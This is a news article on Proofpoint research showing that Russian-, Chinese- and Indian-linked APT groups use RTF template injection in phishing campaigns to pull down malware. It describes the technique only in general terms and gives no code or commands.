Nation state-backed hacking groups are exploiting a simple but effective new technique to power phishing campaigns for spreading malware and stealing information that’s of interest to their governments.
Cybersecurity researchers at Proofpoint say advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian interests are using rich text format (RTF) template injections.
While the use of RTF text file attachments in phishing emails isn’t new, the technique being used by hackers is easier to deploy and more effective because it’s harder for antivirus software to detect – and many organisations won’t block RTF files by default because they’re part of everyday business operations.
SEE: A winning strategy for cybersecurity (ZDNet special report)
The technique is RTF template injection. By altering an RTF file’s document-formatting properties, it’s possible for attackers to weaponise an RTF file to retrieve remote content from a URL controlled by the attackers, enabling them to secretly retrieve a malware payload that gets installed on the victim’s machine.
Attackers can use RTF template injections to open documents in Microsoft Word, which will use the malicious URL to retrieve the payload while also using Word to display the decoy document.
This approach might require luring users into enabling editing or enabling content to begin the process of downloading the payload, but with the right form of social engineering, especially off the back of a convincing lure, a victim can be tricked into allowing this process to take place.
It isn’t a complex technique, but because it is simple and reliable to use, it has become popular with several nation-state hacking operations, which can deploy RTF attacks instead of other, more complex attacks, but still get the same results.
Despite the “Advanced” designation, if APT actors are doing their job well, they will exert the least amount of resources and sophistication necessary to gain access to organisations, said Sherrod DeGrippo, vice president of threat research and detection at Proofpoint.
“This prevents actors from exposing more sophisticated tools if discovered, resulting in a greater operational disruption for threat actor groups to replace technical capabilities when discovered,” she added.
According to researchers, the earliest known instance of an APT group using RTF template injections in a campaign was in February 2021. These injections were undertaken by DoNot Team, an APT group that has been linked to Indian state interests.
Since then, several other state-linked hacking operations have also been seen deploying RTF injections as part of campaigns. These include a group Proofpoint refers to as TA423, also known as Leviathan, which is an ATP group that is linked to China, which has used RTF attacks in several campaigns since April.
One of these campaigns took place in September and targeted entities in Malaysia related to the energy exploration sector – and came with specifically designed phishing emails to lure targets into inadvertently executing the payload.
Then in October, researchers spotted Gamaredon – an offensive hacking group that has been linked to the Russian Federal Security Service (FSB) that uses RTF template injection documents in attacks, which impersonated the Ukrainian Ministry of Defence.
While only a handful of APT groups have attempted to deploy RTF-based attacks so far, researchers warn that the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape – and this could mean campaigns leveraging this technique are adopted by financially motivated cyber criminals.
“The ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors,” said DeGrippo.